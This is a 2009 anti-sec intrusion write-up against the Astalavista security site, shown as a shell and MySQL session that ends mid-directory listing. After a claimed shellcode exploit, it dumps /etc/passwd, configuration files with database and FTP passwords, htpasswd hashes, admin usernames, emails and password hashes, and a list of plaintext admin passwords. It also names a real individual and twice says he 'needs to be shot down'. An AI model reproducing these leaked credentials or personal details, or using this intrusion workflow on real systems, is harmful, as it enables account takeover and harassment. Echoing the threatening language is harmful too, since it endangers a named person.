Sei sulla pagina 1di 19

_____ _________________________ .____ _________ ____.

___ _________________________ / _ \ /
_____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ / /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____
\ | | / /_\ \ / | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \ \____|__ /_______ / |____|\____|__ /_______
\____|__ /\___/ |___/_______ / |____|\____|__ / \/ \/ \/ \/ \/ \/ \/ The Hacking & Security Community
[+] Founded in 1997 by a hacker computer enthusiast [-] Exposed in 2009 by anti-sec group From <
http://astalavista.com/faq>: >> 03. Who's behind the site? >> >> A team of security and IT professionals,
and a countless number of contributors from all over the world. >> 05. Is it true that the site is visited by
script-kiddies and warez fans only? >> >> Absolutely not! The audience behind the site consists of home
users, worldwide companies and corporations, educational and non-profit organizations, government
and military institutions. >> All of these have been visiting the site on a daily basis for the past couple of
years, contributing in various ways, or requesting services and information. Why has Astalavista been
targeted? Other than the fact that they are not doing any of this for the "community" but for the
money, they spread exploits for kids, claim to be a security community (with no real sense of security on
their own servers), and they charge you $6.66 per months to access a dead forum with a directory filled
with public releases and outdated / broken services. We wanted to see how good that "team of security
and IT professionals" really is. Let's begin. anti-sec:~# ./g0tshell astalavista.com -p 80 [+] Connecting to
astalavista.com:80 [+] Grabbing banner... LiteSpeed [+] Injecting shellcode... [-] Wait for it [~] We
g0tshell uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59
EDT 2009 x86_64 x86_64 x86_64 GNU/Linux ID: uid=100(apache) gid=500(apache) groups=500(apache)
sh-3.2$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin vcsa:x:69:69:virtual console memory
owner:/dev:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin rpc:x:32:32:Portmapper RPC
user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:100:500::/var/www:/bin/false diradmin:x:101:101::/usr/local/directadmin:/bin/bash
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash webapps:x:500:501::/var/www/html:/bin/bash
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash admin:x:501:502::/home/admin:/bin/bash
jon:x:502:503::/home/jon:/bin/bash com:x:503:504::/home/com:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin ais:x:39:39:openais Standards Based Cluster
Framework:/:/sbin/nologin astanet:x:504:505::/home/astanet:/bin/bash avahi:x:70:70:Avahi
daemon:/:/sbin/nologin avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin sh-
3.2$ cat /etc/hosts # Do not remove the following line, or various programs # that require network
functionality will fail. 127.0.0.1 localhost.localdomain localhost ::1 localhost6.localdomain6 localhost6
80.74.154.172 asta1.astalavistaserver.com sh-3.2$ pwd /home/com/public_html sh-3.2$ ls -la total
18460 drwxr-xr-x 30 com apache 4096 May 28 17:06 . drwx--x--x 11 com com 4096 Jun 25 2008 .. drwxr-
xr-x 2 com com 4096 Feb 2 19:29 admin drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache drwxr-xr-x
6 com com 4096 Mar 28 21:17 cadmin drwxrwxrwx 2 com com 4096 May 19 00:50 config drwxr-xr-x 2
com com 4096 Mar 20 11:05 core drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules drwxr-xr-x 4
com com 4096 Feb 2 19:29 customizing drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__ -rw-r--r-- 1 com com 8035 May 19 14:26
directory_to_mediadir.php drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd drwxr-xr-x 3 com com 4096 Feb
2 19:29 editor -rw-r--r-- 1 com com 3750 Feb 27 16:12 favicon.ico drwxrwxrwx 2 com com 4096 Jun 4
08:00 feed -rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess -rw-r--r-- 1 com com 7638 Apr 21
08:45 .htaccess.2009-04-21.bak -rw-r--r-- 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool drwxrwxrwx 14 com com 4096 Feb 2 19:29 images -
rw-r--r-- 1 com com 97496 Jun 2 13:01 index.php drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib drwxrwxrwx
12 com com 4096 Jun 2 07:47 media drwxr-xr-x 8 com com 4096 May 11 12:48 modifications drwxr-xr-x
34 com com 4096 May 28 16:30 modules drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
drwxrwxr-x 22 com com 4096 May 28 17:06 _new drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old drwxr-
xr-x 2 com com 4096 Mar 30 12:29 phproxy drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy -rw-r--r-- 1
com com 26 Feb 2 19:33 robots.txt -rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml -rw-r--r-- 1
com com 223 Mar 30 15:32 test.php drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes drwxrwxrwx 3
com com 4096 Jun 4 08:00 tmp drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam sh-3.2$ head -20
index.php <?php /** * The main page for the CMS * @copyright CONTREXX CMS - COMVATION AG *
@author Comvation Development Team * @version v1.0.9.10.1 stable * @package contrexx *
@subpackage core * @link http://www.contrexx.com/ contrexx homepage * @since v0.0.0.0 * @todo
Capitalize all class names in project * @uses /config/configuration.php * @uses /config/settings.php *
@uses /config/version.php * @uses /core/API.php * @uses /core_modules/cache/index.class.php *
@uses /core/error.class.php * @uses /core_modules/banner/index.class.php * @uses
/core_modules/contact/index.class.php sh-3.2$ cd config/ sh-3.2$ ls -la total 32 drwxrwxrwx 2 com com
4096 May 19 00:50 . drwxr-xr-x 30 com apache 4096 May 28 17:06 .. -rwxrwxrwx 1 com com 2998 May
11 12:29 configuration.php -rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php -rwxrwxrwx 1
com com 4186 May 25 12:54 settings.php -rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php sh-3.2$
cat configuration.php [snip] $_DBCONFIG['host'] = 'localhost'; // This is normally set to localhost
$_DBCONFIG['database'] = 'com_contrexx2_live'; // Database name $_DBCONFIG['tablePrefix'] =
'contrexx_'; // Database table prefix $_DBCONFIG['user'] = 'contrexxuser2'; // Database username
$_DBCONFIG['password'] = '0fEYNZgXz1pKe'; // Database password $_DBCONFIG['dbType'] = 'mysql'; //
Database type (e.g. mysql,postgres ..) $_DBCONFIG['charset'] = 'utf8'; // Charset (default, latin1, utf8, ..)
[snip] $_FTPCONFIG['is_activated'] = true; // Ftp support true or false $_FTPCONFIG['use_passive'] =
true; // Use passive ftp mode $_FTPCONFIG['host'] = 'localhost';// This is normally set to localhost
$_FTPCONFIG['port'] = 21; // Ftp remote port $_FTPCONFIG['username'] = 'dev@astalavista.com'; // Ftp
login username $_FTPCONFIG['password'] = 'jajklop0Iuj'; // Ftp login password $_FTPCONFIG['path'] =
'/'; // Ftp path to cms sh-3.2$ cd .. sh-3.2$ cd dvd/ sh-3.2$ ls -la total 2913780 drwxr-xr-x 2 com com
4096 Sep 9 2008 . drwxr-xr-x 30 com apache 4096 May 28 17:06 .. -rw-r--r-- 1 com com 1050061483
May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar -rw-r--r-- 1 com com 1050061483 May 16
2008 astalavista_security_toolbox_dvd_2008.part2.rar -rw-r--r-- 1 com com 880644069 May 16 2008
astalavista_security_toolbox_dvd_2008.part3.rar -rw-r--r-- 1 com com 115 Jan 29 2008 .htaccess sh-3.2$
cat .htaccess authType Basic authName DVD authUserFile
/home/com/domains/astalavista.com/.htpasswd/.htadm_pwd require valid-user sh-3.2$ cat
/home/com/domains/astalavista.com/.htpasswd/.htadm_pwd DVDdownload:CRD8cuY6.MPT6
DVDdownload2:CR8a36.wluFMg sh-3.2$ cat test.php <?php $url =
'aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZ
W1hbGVfc3R1ZGVudC5qcGc%3D'; $url = str_replace(array('&amp;', '&#38;'), '&',
base64_decode(rawurldecode($url))); echo $url; ?> sh-3.2$ cd modifications/ sh-3.2$ ls -la total 32
drwxr-xr-x 8 com com 4096 May 11 12:48 . drwxr-xr-x 30 com apache 4096 May 28 17:06 .. drwxr-xr-x 3
com com 4096 Feb 2 19:33 com_avtng drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs drwxr-xr-x 2
com com 4096 Mar 2 10:35 onlinetools drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc drwxr-xr-x 2 com
com 4096 Feb 2 19:33 search drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp sh-3.2$ ls -R .: com_avtng
cronjobs onlinetools pjirc search _tmp ./com_avtng: avtng.php banner_bottom.inc.php
banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php
banner_top.inc.php iframe.php scripts ./com_avtng/scripts: popunder.js ./cronjobs: exploits.php
exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
./cronjobs/tmp: contrexx_module_onlinetools_defaultports.csv
contrexx_module_onlinetools_geolitecity_country.csv ./onlinetools: index.php ./pjirc: a_big.jpg
english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt
SimpleApplet.html versions.txt background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-
readme.txt securedirc.cab snd ./pjirc/img: ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif
garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif arbre.gif bouche.gif clin-oeuil-
langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif verre-
eau.gif argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-
oui.gif soleil.gif verre-vin.gif ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-
2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif biere.gif chien.gif comprends-pas.gif enerve1.gif
fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif ./pjirc/snd: bell2.au ding.au ./search:
searchEngines.php search.php ./_tmp: defaultPorts.php defaultPorts.txt sh-3.2$ cd cronjobs/ sh-3.2$ cat
exploits.php [snip] $categories = array(); $milw0rmFile = FULLPATH .
'/modifications/cronjobs/tmp/milw0rm/sploitlist.txt'; $expolits = file($milw0rmFile); $comExploits =
array(); [snip] // manage data for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640 // get
path and title $expolits[$x] = trim($expolits[$x]); $path = str_replace('./', FULLPATH .
'/modifications/cronjobs/tmp/milw0rm/', substr($expolits[$x], 0, strpos($expolits[$x], ' '))); $title =
htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ' ') + 1, strlen($expolits[$x])), ENT_QUOTES);
// check if file exists if (file_exists($path)) { $text = file_get_contents($path); // get content and date
//$text = htmlspecialchars($text, ENT_QUOTES); $tmptext = addslashes(htmlentities($text,
ENT_QUOTES, "UTF-8")); if ($tmptext != '') { $text = $tmptext; } else { $text =
addslashes(htmlentities($text, ENT_QUOTES)); } $date = str_replace('milw0rm.com [', '', str_replace(']',
'', strstr($text, 'milw0rm.com ['))); $tmp = explode('-', $date); $date = mktime(0, 0, 0, trim($tmp[1]),
trim($tmp[2]), trim($tmp[0])); $cat = getCategory ($path); $ext = pathinfo(basename($path)); $ext =
$ext['extension']; $qStr = " SELECT `id` FROM `contrexx_module_exploits` WHERE `title` = '" . $title . "'
AND `date` = '" . $date . "' "; echo $x + 1 . ' von ' . count($expolits) . ' -> ' . $qStr . "\n"; $q = $_objDB-
>query($qStr); if ($q->numRows() == 0) { // prepare array $comExploits[$x]['date'] = $date;
$comExploits[$x]['title'] = $title; $comExploits[$x]['author'] = 'milw0rm'; $comExploits[$x]['text'] = $text;
$comExploits[$x]['source'] = $ext; $comExploits[$x]['url1'] = ''; $comExploits[$x]['url2'] = '';
$comExploits[$x]['catid'] = $cat; $comExploits[$x]['lang'] = '2'; $comExploits[$x]['userid'] = '12';
$comExploits[$x]['startdate'] = '0000-00-00'; $comExploits[$x]['enddate'] = '0000-00-00';
$comExploits[$x]['status'] = '1'; $comExploits[$x]['changelog'] = $date; } [snip] $xml = '<?xml
version="1.0" encoding="UTF-8"?> <rss version="2.0"> <channel> <title>ASTALAVISTA.com -
Exploits</title> <link>http://www.astalavista.com/exploits</link> <description>All availably
Exploits.</description> <language>en-us</language> <lastBuildDate>' . date('F, j M Y H:i:s O') .
'</lastBuildDate> <docs>http://blogs.law.harvard.edu/tech/rss</docs>
<generator>Astalavista.com</generator> <webMaster>info@astalavista.com</webMaster>' . $items . '
</channel> </rss>'; if (file_exists(FULLPATH . '/feed/exploits.xml')) { unlink (FULLPATH .
'/feed/exploits.xml'); } file_put_contents(FULLPATH . '/feed/exploits.xml', $xml); [snip] sh-3.2$ cat
exploits.sh #!/bin/sh ########################################################### # # # Title:
milw0rm exploits adder # # Description: Add all milw0rm exploits to the # # Astalavista.com database #
# # # Company: Astalavista Group # # Author: Paulo M. Santos # # E-Mail: paulo.santos@astalavista.ch #
# # ########################################################### # path
this_path=/home/com/public_html/modifications/cronjobs # change directory cd $this_path cd tmp/ #
delete files rm -rf milw0rm.tar.* & rm -rf milw0rm/ & # wget milw0rm paket wget
http://www.milw0rm.com/sploits/milw0rm.tar.bz2 # extract milw0rm paket tar -xvf milw0rm.tar.bz2 #
change owner chown -R com . chgrp -R com . # execute php script cd $this_path php -q exploits.php #
delete files rm -rf tmp/milw0rm.tar.* rm -rf tmp/milw0rm/ sh-3.2$ echo "Paulo M. Santos needs to be
shot down." Paulo M. Santos needs to be shot down. mysql -u contrexxuser2 -p Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 261694
Server version: 5.0.45-community-log MySQL Community Edition (GPL) Type 'help;' or '\h' for help. Type
'\c' to clear the buffer. mysql> show databases; +--------------------+ | Database | +--------------------+ |
information_schema | | com_contrexx2 | | com_contrexx2_live | | test | +--------------------+ 4 rows in
set (0.00 sec) mysql> use com_contrexx2_live Database changed mysql> show tables; +-----------------------
---------------------------+ | Tables_in_com_contrexx2_live | +--------------------------------------------------+ |
cc_banner_counter | | cc_search_counter | | contrexx_access_group_dynamic_ids | |
contrexx_access_group_static_ids | | contrexx_access_rel_user_group | | contrexx_access_settings | |
contrexx_access_user_attribute | | contrexx_access_user_attribute_name | |
contrexx_access_user_attribute_value | | contrexx_access_user_core_attribute | |
contrexx_access_user_groups | | contrexx_access_user_mail | | contrexx_access_user_profile | |
contrexx_access_user_title | | contrexx_access_user_validity | | contrexx_access_users | |
contrexx_backend_areas | | contrexx_backups | | contrexx_content | | contrexx_content_history | |
contrexx_content_logfile | | contrexx_content_navigation | | contrexx_content_navigation_history | |
contrexx_ids | | contrexx_languages | | contrexx_lib_country | | contrexx_log | |
contrexx_module_alias_source | | contrexx_module_alias_target | | contrexx_module_block_blocks | |
contrexx_module_block_rel_lang | | contrexx_module_block_rel_pages | |
contrexx_module_block_settings | | contrexx_module_blog_categories | |
contrexx_module_blog_comments | | contrexx_module_blog_message_to_category | |
contrexx_module_blog_messages | | contrexx_module_blog_messages_lang | |
contrexx_module_blog_networks | | contrexx_module_blog_networks_lang | |
contrexx_module_blog_settings | | contrexx_module_blog_votes | | contrexx_module_calendar | |
contrexx_module_calendar_access | | contrexx_module_calendar_categories | |
contrexx_module_calendar_form_data | | contrexx_module_calendar_form_fields | |
contrexx_module_calendar_registrations | | contrexx_module_calendar_settings | |
contrexx_module_calendar_style | | contrexx_module_contact_form | |
contrexx_module_contact_form_data | | contrexx_module_contact_form_field | |
contrexx_module_contact_settings | | contrexx_module_data_categories | |
contrexx_module_data_message_to_category | | contrexx_module_data_messages | |
contrexx_module_data_messages_lang | | contrexx_module_data_placeholders | |
contrexx_module_data_settings | | contrexx_module_directory_access | |
contrexx_module_directory_categories | | contrexx_module_directory_dir | |
contrexx_module_directory_inputfields | | contrexx_module_directory_levels | |
contrexx_module_directory_mail | | contrexx_module_directory_rel_dir_cat | |
contrexx_module_directory_rel_dir_level | | contrexx_module_directory_settings | |
contrexx_module_directory_settings_google | | contrexx_module_directory_vote | |
contrexx_module_docsys | | contrexx_module_docsys_categories | |
contrexx_module_egov_configuration | | contrexx_module_egov_orders | |
contrexx_module_egov_product_calendar | | contrexx_module_egov_product_fields | |
contrexx_module_egov_products | | contrexx_module_egov_settings | | contrexx_module_exploits | |
contrexx_module_exploits_categories | | contrexx_module_feed_category | |
contrexx_module_feed_news | | contrexx_module_feed_newsml_association | |
contrexx_module_feed_newsml_categories | | contrexx_module_feed_newsml_documents | |
contrexx_module_feed_newsml_providers | | contrexx_module_forum_access | |
contrexx_module_forum_categories | | contrexx_module_forum_categories_lang | |
contrexx_module_forum_notification | | contrexx_module_forum_postings | |
contrexx_module_forum_rating | | contrexx_module_forum_settings | |
contrexx_module_forum_statistics | | contrexx_module_gallery_categories | |
contrexx_module_gallery_comments | | contrexx_module_gallery_language | |
contrexx_module_gallery_language_pics | | contrexx_module_gallery_pictures | |
contrexx_module_gallery_settings | | contrexx_module_gallery_votes | | contrexx_module_guestbook
| | contrexx_module_guestbook_settings | | contrexx_module_livecam | |
contrexx_module_livecam_settings | | contrexx_module_market | | contrexx_module_market_access |
| contrexx_module_market_categories | | contrexx_module_market_mail | |
contrexx_module_market_paypal | | contrexx_module_market_settings | |
contrexx_module_market_spez_fields | | contrexx_module_mediadir_access | |
contrexx_module_mediadir_categories | | contrexx_module_mediadir_comments | |
contrexx_module_mediadir_dir | | contrexx_module_mediadir_inputfields | |
contrexx_module_mediadir_levels | | contrexx_module_mediadir_mail | |
contrexx_module_mediadir_rel_dir_cat | | contrexx_module_mediadir_rel_dir_level | |
contrexx_module_mediadir_reports | | contrexx_module_mediadir_settings | |
contrexx_module_mediadir_settings_google | | contrexx_module_mediadir_vote | |
contrexx_module_memberdir_directories | | contrexx_module_memberdir_name | |
contrexx_module_memberdir_settings | | contrexx_module_memberdir_values | |
contrexx_module_nettools_allowed_groups | | contrexx_module_nettools_settings | |
contrexx_module_news | | contrexx_module_news_access | | contrexx_module_news_categories | |
contrexx_module_news_settings | | contrexx_module_news_teaser_frame | |
contrexx_module_news_teaser_frame_templates | | contrexx_module_news_ticker | |
contrexx_module_newsletter | | contrexx_module_newsletter_attachment | |
contrexx_module_newsletter_category | | contrexx_module_newsletter_confirm_mail | |
contrexx_module_newsletter_rel_cat_news | | contrexx_module_newsletter_rel_user_cat | |
contrexx_module_newsletter_settings | | contrexx_module_newsletter_template | |
contrexx_module_newsletter_tmp_sending | | contrexx_module_newsletter_user | |
contrexx_module_newsletter_user_title | | contrexx_module_onlinetools_defaultports | |
contrexx_module_onlinetools_defaultports_back | | contrexx_module_onlinetools_geolitecity_blocks |
| contrexx_module_onlinetools_geolitecity_country | |
contrexx_module_onlinetools_geolitecity_location | | contrexx_module_podcast_category | |
contrexx_module_podcast_medium | | contrexx_module_podcast_rel_category_lang | |
contrexx_module_podcast_rel_medium_category | | contrexx_module_podcast_settings | |
contrexx_module_podcast_template | | contrexx_module_proxydb | | contrexx_module_recommend |
| contrexx_module_repository | | contrexx_module_securitynews_cats | |
contrexx_module_securitynews_feeds | | contrexx_module_securitynews_news | |
contrexx_module_shop_categories | | contrexx_module_shop_config | |
contrexx_module_shop_countries | | contrexx_module_shop_currencies | |
contrexx_module_shop_customers | | contrexx_module_shop_importimg | |
contrexx_module_shop_lsv | | contrexx_module_shop_mail | | contrexx_module_shop_mail_content |
| contrexx_module_shop_manufacturer | | contrexx_module_shop_order_items | |
contrexx_module_shop_order_items_attributes | | contrexx_module_shop_orders | |
contrexx_module_shop_payment | | contrexx_module_shop_payment_processors | |
contrexx_module_shop_pricelists | | contrexx_module_shop_products | |
contrexx_module_shop_products_attributes | | contrexx_module_shop_products_attributes_name | |
contrexx_module_shop_products_attributes_value | | contrexx_module_shop_products_downloads | |
contrexx_module_shop_rel_countries | | contrexx_module_shop_rel_payment | |
contrexx_module_shop_rel_shipment | | contrexx_module_shop_shipment_cost | |
contrexx_module_shop_shipper | | contrexx_module_shop_vat | | contrexx_module_shop_zones | |
contrexx_module_u2u_address_list | | contrexx_module_u2u_message_log | |
contrexx_module_u2u_sent_messages | | contrexx_module_u2u_settings | |
contrexx_module_u2u_user_log | | contrexx_modules | | contrexx_sessions | | contrexx_settings | |
contrexx_settings_smtp | | contrexx_skins | | contrexx_stats_browser | | contrexx_stats_colourdepth |
| contrexx_stats_config | | contrexx_stats_country | | contrexx_stats_hostname | |
contrexx_stats_javascript | | contrexx_stats_operatingsystem | | contrexx_stats_referer | |
contrexx_stats_requests | | contrexx_stats_requests_summary | | contrexx_stats_screenresolution | |
contrexx_stats_search | | contrexx_stats_spiders | | contrexx_stats_spiders_summary | |
contrexx_stats_visitors | | contrexx_stats_visitors_summary | | contrexx_voting_additionaldata | |
contrexx_voting_email | | contrexx_voting_rel_email_system | | contrexx_voting_results | |
contrexx_voting_system | | foo | +--------------------------------------------------+ 227 rows in set (0.01 sec)
mysql> select count(*) as skids from contrexx_access_users; +-------+ | skids | +-------+ | 53699 | +-------+
1 row in set (0.00 sec) mysql> describe contrexx_access_users; +------------------+---------------------------------
---------+------+-----+--------------+----------------+ | Field | Type | Null | Key | Default | Extra | +------------------
+------------------------------------------+------+-----+--------------+----------------+ | id | int(10) unsigned | NO | PRI
| NULL | auto_increment | | is_admin | tinyint(1) unsigned | NO | | 0 | | | username | varchar(40) |
YES | MUL | NULL | | | password | varchar(32) | YES | | NULL | | | regdate | int(14) unsigned | NO | | 0
| | | expiration | int(14) unsigned | NO | | 0 | | | validity | int(10) unsigned | NO | | 0 | | | last_auth |
int(14) unsigned | NO | | 0 | | | last_activity | int(14) unsigned | NO | | 0 | | | email | varchar(255) |
YES | | NULL | | | email_access | enum('everyone','members_only','nobody') | NO | | nobody | | |
frontend_lang_id | int(2) unsigned | NO | | 0 | | | backend_lang_id | int(2) unsigned | NO | | 0 | | |
active | tinyint(1) | NO | | 0 | | | profile_access | enum('everyone','members_only','nobody') | NO | |
members_only | | | restore_key | varchar(32) | NO | | | | | restore_key_time | int(14) unsigned | NO |
| 0 | | | u2u_active | enum('0','1') | NO | | 1 | | +------------------+------------------------------------------+------+-
----+--------------+----------------+ 18 rows in set (0.00 sec) mysql> select username,password,email from
contrexx_access_users where is_admin = 1; +------------+----------------------------------+-----------------------------
+ | username | password | email | +------------+----------------------------------+-----------------------------+ |
system | 0defe9e458e745625fffbc215d7801c5 | info@comvation.com | | prozac |
1f65f06d9758599e9ad27cf9707f92b5 | prozac@astalavista.com | | Be1er0ph0r |
78d164dc7f57cc142f07b1b4629b958a | paulo.santos@astalavista.ch | | schmid |
0defe9e458e745625fffbc215d7801c5 | ivan.schmid@comvation.com | +------------+----------------------------
------+-----------------------------+ 4 rows in set (0.04 sec) mysql> exit; Bye [~] There you go, your "team of
security and IT professionals" is a joke. +------------------------------+ system:f82BN3+_*
Be1er0ph0r:belerophor4astacom prozac:asta4cms! commander:mpbdaagf6m sykadul:ak29eral +---------
---------------------+ [~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping
script(s) ...and the others, find another area to get paid from, security isn't for sale and you obviously fail
at it. [~] Lets move to astalavista.net now, From <https://www.astalavista.net/>: >> Everyone knows
that the best defense is a good offense. >> Those who wait for their foes to find a security loophole are
opting for the wrong strategy. >> The ASTALAVISTA hacking & security community is the largest IT
security community in the world. >> It.s a platform for both IT specialists and novices, and anyone
interested in expanding and updating their knowledge regarding IT security and hacking." >> Go ahead,
try and hack our server . in a completely legal way! >> Learn by doing: We offer our members tricky
tasks and challenges on an >> ongoing basis so you can test your knowledge and abilities. You can also
>> demonstrate what you.ve mastered by taking part in regular hacker contests >> and war games [~]
Lets take a look there, after all... they are hack-proof, aren't they?! [-] Tricky task: Find home dir of
astalavista.net sh-3.2$ ls -la ~astanet total 48 drwx--x--x 6 astanet astanet 4096 Dec 23 15:55 . drwxr-xr-
x 14 root root 4096 Mar 11 17:56 .. drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth -rw------- 1 astanet
astanet 3892 Apr 16 12:14 .bash_history -rw-r--r-- 1 astanet astanet 33 Dec 17 21:50 .bash_logout -rw-r-
-r-- 1 astanet astanet 176 Dec 17 21:50 .bash_profile -rw-r--r-- 1 astanet astanet 124 Dec 17 21:50
.bashrc drwx--x--x 3 astanet astanet 4096 Dec 23 12:18 domains drwxrwx--- 3 astanet mail 4096 Dec 23
12:18 imap drwx------ 2 astanet astanet 4096 Dec 23 12:18 mail lrwxrwxrwx 1 astanet astanet 37 Dec 23
12:18 public_html -> ./domains/astalavista.net/public_html -rw-r----- 1 astanet mail 34 Dec 22 12:41
.shadow sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/ sh-3.2$ ls -la total 200 drwxr-
x--- 29 astanet apache 4096 Jan 6 13:58 . drwx--x--x 8 astanet astanet 4096 Dec 23 13:53 .. drwxr-xr-x 3
astanet astanet 4096 Dec 27 2006 _007 drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql drwxr-xr-
x 7 astanet astanet 4096 Dec 22 14:16 astanet@astalavista.com drwxrwxrwx 2 astanet astanet 4096 Jan
5 2006 backend drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner -rw-r--r-- 1 astanet astanet 25724
Apr 4 2006 banner.jpg drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config drwxr-xr-x 3 astanet
astanet 4096 Jan 12 08:52 cron drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd -rw-r--r-- 1 astanet
astanet 36 Jan 5 2006 error.php -rw-r--r-- 1 astanet astanet 1406 Jan 5 2006 favicon.ico drwxrwxrwx 2
astanet astanet 4096 Dec 15 2006 feed drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour -rw-r--r--
1 astanet astanet 18 Jan 5 2006 htaccess -rw-r--r-- 1 astanet astanet 585 Mar 24 14:50 .htaccess -rw-r--r-
- 1 astanet astanet 398 Jan 5 2006 index1.php -rw-r--r-- 1 astanet astanet 1036 Jan 5 2006 _index.html -
rw-r--r-- 1 astanet astanet 6880 Dec 23 14:44 index.php -rw-r--r-- 1 astanet astanet 676 Mar 21 2006
index_redirect.php -rw-r--r-- 1 astanet astanet 739 Feb 24 2006 index.swf drwxr-xr-x 4 astanet astanet
4096 Oct 18 2006 irc drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang drwxr-xr-x 13 astanet astanet
4096 Sep 21 2006 lib drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log drwxr-xr-x 2 astanet astanet
4096 Jan 13 14:02 member drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata drwxr-xr-x 2
astanet astanet 4096 Jan 5 2006 new -rw-r--r-- 1 astanet astanet 7219 Feb 24 2006 pix1.swf drwxr-xr-x 2
astanet astanet 4096 Oct 27 2006 re -rw-r--r-- 1 astanet astanet 23 Jan 5 2006 robots.txt drwxr-xr-x 3
astanet astanet 4096 Aug 11 2006 rss drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com drwxr-xr-x 7 astanet astanet 4096 Aug 11
2006 themes drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src drwxr-xr-x 5 astanet astanet 4096
Aug 11 2006 tpl drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2 drwxr-xr-x 16 astanet astanet 4096 Jul
5 2006 v2_old -rw-r--r-- 1 astanet astanet 35 Dec 4 2006 webcash.php drwxr-xr-x 13 astanet astanet
